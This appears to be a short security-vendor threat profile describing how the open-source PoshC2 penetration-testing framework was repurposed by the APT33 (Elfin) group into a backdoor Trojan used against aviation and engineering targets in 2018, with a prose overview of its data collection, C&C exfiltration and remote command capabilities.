POSHC2 Description

Cybersecurity experts have been using a tool called POSHC2 to make sure that the networks they are administrating are safe from cyber-attacks. POSHC2 is an exploitation framework that helps penetration testers in particular. However, the POSHC2 framework is a free tool, and all of its source code is available to anyone who is interested freely. Naturally, this has attracted the attention of cyber crooks who have altered the code of the framework slightly and managed to turn it into a fully weaponized hacking tool. These threatening variants of the POSHC2 framework can be used to target companies and individuals alike.

Operations Targeting Major Industries

Among the con actors who are taking advantage of the weaponized POSHC2 framework is the APT33 (Advanced Persistent Threat) group. They also are known under the alias Elfin Team. This hacking group is known to be located in Iran, and they have been launching campaigns targeting businesses and institutions in the United States, South Korea and Saudi Arabia. It would appear the APT33 acquired a taste for the POSHC2 framework, as they had been using it in numerous campaigns in 2018. Two of their targets were aviation and engineering industries. The hacking group has set up a timer that would terminate the activity of the weaponized variant of the POSHC2 framework on July 29, 2018. Not many con actors take this measure, but some prefer to be on the safe side and leave fewer traces for cybersecurity experts.

Operates as a Backdoor Trojan

The POSHC2 framework has been turned into what is a backdoor Trojan essentially. This means that this threat can almost operate as a regular backdoor Trojan. Once it compromises a target, the POSHC2 backdoor will begin collecting information about the host's system hardware, software, username, PC name and the Process ID of the threat. All the collected information will then be exfiltrated to the C&C (Command & Control) server of the operators of the POSHC2 backdoor. The POSHC2 backdoor can receive remote commands from the C&C server. With the help of the C&C server, the POSHC2 backdoor also is capable of downloading and executing additional malware on the compromised machine. Furthermore, this iteration of the POSHC2 framework also can execute PowerShell commands.

It is not uncommon for cyber crooks to hijack a legitimate application and weaponize it. Businesses need to take their cybersecurity more seriously.